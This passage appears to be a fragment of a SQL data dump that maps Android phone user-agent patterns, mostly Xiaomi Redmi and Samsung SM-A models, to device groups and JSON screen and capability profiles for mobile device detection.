Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Note4x) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi S2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Y2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Redmi Y3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S3-SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S397) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S3_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S4-KC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S40Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":755,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S5-SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S61) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S68Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; S95Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A102U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A102U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A105F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A105FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A105G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A105M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A107F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A107M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A202F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A205F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A205FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A205G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A205U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A205W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A205YN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A207F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A207M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A305F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A305FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A305G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A305GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A305YN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A307FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A307G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A307GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A307GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A405FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A405FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A505F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A505FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A505FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A505G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A505GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A505GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A505U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A505W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A507FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A530W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A600F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A600FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A600G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A600GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A600U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A605F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A605FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A605G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A605GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A7050) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A705F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A705FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A705MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A705W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A730F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A750F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A750FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A750G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A750GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A805F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A908B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A920F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G390F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 